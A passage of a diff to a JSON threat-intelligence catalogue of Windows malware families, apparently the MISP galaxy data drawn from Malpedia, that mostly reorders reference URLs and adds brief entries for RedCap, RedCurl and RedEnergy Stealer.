"https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html", + "https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "http://reversing.fun/posts/2021/04/15/unpacking_ragnarlocker_via_emulation.html", + "https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/" ], "synonyms": [], "type": [] @@ -40027,14 +41919,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://news.sophos.com/en-us/2020/05/21/asnarok2/", "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw", "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/", "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-releases-master-decryptor-after-shutdown/", - "https://news.sophos.com/en-us/2020/05/21/asnarok2/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3" ], "synonyms": [], "type": [] @@ -40047,14 +41939,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", "https://www.youtube.com/watch?v=GfbxHy6xnbA", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf", - "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", "https://www.mandiant.com/resources/unc2452-merged-into-apt29", - "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515" + "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf" ], "synonyms": [], "type": [] @@ -40080,10 +41972,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", - "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2017-02-15-the-rambo-backdoor.md", - "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf", "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html", - "https://www.secureworks.com/research/threat-profiles/bronze-overbrook" + "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2017-02-15-the-rambo-backdoor.md" ], "synonyms": [ "brebsd" @@ -40110,30 +42002,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", - "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf", - "https://www.youtube.com/watch?v=l6ZunH6YG0A", - "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail", - "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", - "https://artik.blue/malware4", - "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", - "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", - "https://redcanary.com/resources/webinars/deep-dive-process-injection/", - "https://muha2xmad.github.io/unpacking/ramnit/", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", - "https://research.checkpoint.com/ramnits-network-proxy-servers/", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/", - "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", - "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-fairfax", "https://www.youtube.com/watch?v=N4f2e8Mygag", - "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", - "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", - "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", - "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://research.checkpoint.com/ramnits-network-proxy-servers/", + "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", + "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", + "https://muha2xmad.github.io/unpacking/ramnit/", + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail", + "https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/", + "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", + "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html", + "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://redcanary.com/resources/webinars/deep-dive-process-injection/", + "https://artik.blue/malware4", + "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", + "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "http://www.secureworks.com/research/threat-profiles/gold-fairfax" + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", + "https://www.youtube.com/watch?v=l6ZunH6YG0A", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf" ], "synonyms": [ "Nimnul" @@ -40148,13 +42040,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay", - "https://www.youtube.com/watch?v=SKIu4LqMrns", - "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", - "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html", - "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", "https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/", "https://www.antiy.cn/research/notice&report/research_report/20200522.html", - "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/" + "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", + "https://www.youtube.com/watch?v=SKIu4LqMrns", + "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/", + "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" ], "synonyms": [], "type": [] @@ -40167,13 +42059,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", + "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", + "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/", "https://bin.re/blog/the-dga-of-ranbyus/", + "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/", - "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", - "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", - "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf", - "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/" + "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf" ], "synonyms": [], "type": [] @@ -40225,34 +42117,35 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://github.com/Bleeping/Ransom.exx", - "https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", + "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", + "https://www.ic3.gov/Media/News/2021/211101.pdf", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/", - "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/", + "https://github.com/Bleeping/Ransom.exx", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", "https://medium.com/proferosec-osm/ransomexx-fixing-corrupted-ransom-8e379bcaf701", "https://www.youtube.com/watch?v=qxPXxWMI2i4", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", - "https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", - "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", - "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://www.ic3.gov/Media/News/2021/211101.pdf", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", + "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", "https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.sentinelone.com/anthology/ransomexx/", + "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx" + "https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "Defray777", @@ -40268,8 +42161,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", - "https://forum.malekal.com/viewtopic.php?t=36485&start=", - "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2" + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2", + "https://forum.malekal.com/viewtopic.php?t=36485&start=" ], "synonyms": [ "WinLock" @@ -40297,11 +42190,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://twitter.com/malwrhunterteam/status/997748495888076800", "https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://twitter.com/malwrhunterteam/status/977275481765613569", - "https://twitter.com/malwrhunterteam/status/997748495888076800" + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://www.youtube.com/watch?v=LUxOcpIRxmg" ], "synonyms": [], "type": [] @@ -40337,7 +42230,7 @@ "value": "Rarog" }, { - "description": "This ransomware encrypts all user’s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.", + "description": "This ransomware encrypts all user\u2019s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", @@ -40354,20 +42247,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin", - "https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis/", - "https://unit42.paloaltonetworks.com/unsigned-dlls/", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis", + "https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis/", + "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/", + "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", "https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe", "https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html", - "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://redcanary.com/blog/raspberry-robin/", + "https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks", + "https://unit42.paloaltonetworks.com/unsigned-dlls/", "https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices", "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm", - "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/", - "https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks" + "https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/" ], "synonyms": [ "LINK_MSIEXEC", @@ -40384,16 +42278,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware", "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0", - "https://content.fireeye.com/apt/rpt-apt38", "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", + "https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf", + "https://twitter.com/PhysicalDrive0/status/828915536268492800", + "https://content.fireeye.com/apt/rpt-apt38", + "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", + "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware", - "https://twitter.com/PhysicalDrive0/status/828915536268492800", - "https://www.secureworks.com/research/threat-profiles/nickel-gladstone" + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "https://community.broadcom.com/symantecenterprise/viewdocument/attackers-target-dozens-of-global-b" ], "synonyms": [ "QUICKRIDE" @@ -40408,6 +42304,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos", + "https://securelist.com/lazarus-under-the-hood/77908/", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "http://blog.trex.re.kr/3" ], @@ -40424,9 +42321,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel", + "https://github.com/FrenchCisco/RATel", "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - "https://github.com/FrenchCisco/RATel" + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/" ], "synonyms": [], "type": [] @@ -40439,8 +42336,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratsnif", - "https://threatvector.cylance.com/en_us/home/threat-spotlight-ratsnif-new-network-vermin-from-oceanlotus.html", - "https://www.secureworks.com/research/threat-profiles/tin-woodlawn" + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-ratsnif-new-network-vermin-from-oceanlotus.html" ], "synonyms": [], "type": [] @@ -40453,9 +42350,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", - "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite", + "https://www.youtube.com/watch?v=fevGZs0EQu8", "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", - "https://www.youtube.com/watch?v=fevGZs0EQu8" + "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" ], "synonyms": [], "type": [] @@ -40495,17 +42392,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", - "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", - "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", - "https://www.f-secure.com/content/dam/f-secure/en/labs/whitepapers/Callisto_Group.pdf", - "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf", - "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", - "https://www.f-secure.com/documents/996508/1030745/callisto-group", "https://www.vice.com/en_us/article/jgxvdx/jan-marsalek-wirecard-bizarre-attempt-to-buy-hacking-team-spyware", - "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/" + "https://www.f-secure.com/documents/996508/1030745/callisto-group", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", + "https://www.f-secure.com/content/dam/f-secure/en/labs/whitepapers/Callisto_Group.pdf", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", + "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html" ], "synonyms": [ "Crisis", @@ -40548,8 +42445,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf", - "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", - "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/" + "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/", + "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/" ], "synonyms": [ "GREYSTUFF" @@ -40564,10 +42461,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", - "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", - "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", - "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under" + "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html", + "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under", + "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/" ], "synonyms": [], "type": [] @@ -40594,18 +42491,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker", - "https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/", - "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://socprime.com/blog/raccoon-stealer-detection-a-novel-malware-version-2-0-named-recordbreaker-offers-hackers-advanced-password-stealing-capabilities/", - "https://d01a.github.io/raccoon-stealer/", - "https://www.youtube.com/watch?v=NI_Yw2t9zoo", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8", + "https://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/", + "https://d01a.github.io/raccoon-stealer/", + "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon", + "https://www.youtube.com/watch?v=NI_Yw2t9zoo", "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family", - "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/" + "https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/", + "https://asec.ahnlab.com/en/52072/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://socprime.com/blog/raccoon-stealer-detection-a-novel-malware-version-2-0-named-recordbreaker-offers-hackers-advanced-password-stealing-capabilities/", + "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [], "type": [] @@ -40626,27 +42526,66 @@ "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", "value": "RedAlpha" }, + { + "description": "According to Trend Micro, this backdoor receives valid domain credentials as an argument and uses it to log on to the Exchange Server and use it for data exfiltration purposes. The main function of this stage is to take the stolen password from the argument and send it to the attackers as an attachment in an email. We also observed that the threat actors relay these emails via government Exchange Servers using vaild accounts with stolen passwords. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redcap", + "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c1ba2ad1-70d9-4833-ac15-18fb8d0a2408", + "value": "RedCap" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redcurl", + "https://go.group-ib.com/report-redcurl-awakening-en" + ], + "synonyms": [], + "type": [] + }, + "uuid": "913d3007-9c2b-4c1c-b3a6-2ecb736bc338", + "value": "RedCurl" + }, + { + "description": "According to Zscaler ThreatLabz, RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.The name of the malware was kept due to the common method names observed during the analysis.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redenergy_stealer", + "https://www.zscaler.com/blogs/security-research/ransomware-redefined-redenergy-stealer-ransomware-attacks" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b5cbe5c8-8cda-43af-bd67-99dcbd9e0dbf", + "value": "RedEnergy Stealer" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware", - 